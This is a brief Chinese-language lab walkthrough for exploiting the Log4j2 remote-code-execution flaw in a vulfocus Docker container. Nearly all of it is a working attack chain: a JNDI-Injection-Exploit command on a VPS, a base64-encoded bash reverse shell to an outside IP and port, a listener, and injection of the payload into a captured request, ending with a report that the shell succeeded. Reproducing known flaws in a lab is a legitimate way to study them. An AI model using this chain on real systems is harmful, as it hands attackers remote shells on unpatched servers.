拉取本地环境运行,

docker pull vulfocus/log4j2-rce-2021-12-09:latest

docker run -d -P vulfocus/log4j2-rce-2021-12-09:latest

1.首先在vps用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar启用ldap和rmi服务 ,

反弹shell在线编码,反弹shell用正常的就行。
反弹shell的命令需要base64编码。

https://www.jackson-t.ca/runtime-exec-payloads.html/

java -jar 1.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMTAuNDIuMjQ2LjEzNS83Nzg4IDA+JjE=}|{base64,-d}|{bash,-i}" -A "ip"

2.然后在vps复制会话开启监听。

3.抓包,传入payload

反弹shell成功